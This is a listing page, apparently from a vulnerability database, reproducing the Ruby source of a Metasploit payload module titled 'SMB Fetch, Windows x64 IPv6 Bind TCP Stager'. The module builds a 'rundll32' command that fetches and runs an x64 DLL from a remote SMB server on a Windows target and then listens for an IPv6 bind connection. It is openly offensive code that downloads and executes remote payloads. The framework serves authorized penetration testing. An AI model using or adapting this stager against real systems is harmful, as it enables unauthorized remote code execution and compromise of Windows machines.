Lucene search

K
metasploitSpencer McIntyre, ege <[email protected]>, sf <[email protected]>MSF:PAYLOAD-CMD-WINDOWS-SMB-X64-PEINJECT-BIND_IPV6_TCP-
HistoryJan 29, 2024 - 9:44 p.m.

SMB Fetch, Windows x64 IPv6 Bind TCP Stager

2024-01-2921:44:28
Spencer McIntyre, ege <[email protected]>, sf <[email protected]>
www.rapid7.com
27
fetch and execute
x64 payload
smb server
spencer mcintyre
windows
tcp stager
metasploit framework

7.6 High

AI Score

Confidence

Low

Fetch and execute an x64 payload from an SMB server. Listen for an IPv6 connection (Windows x64)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  include Msf::Payload::Adapter::Fetch::SMB

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMB Fetch',
        'Description' => 'Fetch and execute an x64 payload from an SMB server.',
        'Author' => 'Spencer McIntyre',
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'License' => MSF_LICENSE,
        'AdaptedArch' => ARCH_X64,
        'AdaptedPlatform' => 'win'
      )
    )
    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR')
  end

  def srvport
    445 # UNC paths for SMB services *must* be 445
  end

  def generate_fetch_commands
    "rundll32 #{unc},0"
  end

  # generate a DLL instead of an EXE
  alias generate_payload_exe generate_payload_dll
end

7.6 High

AI Score

Confidence

Low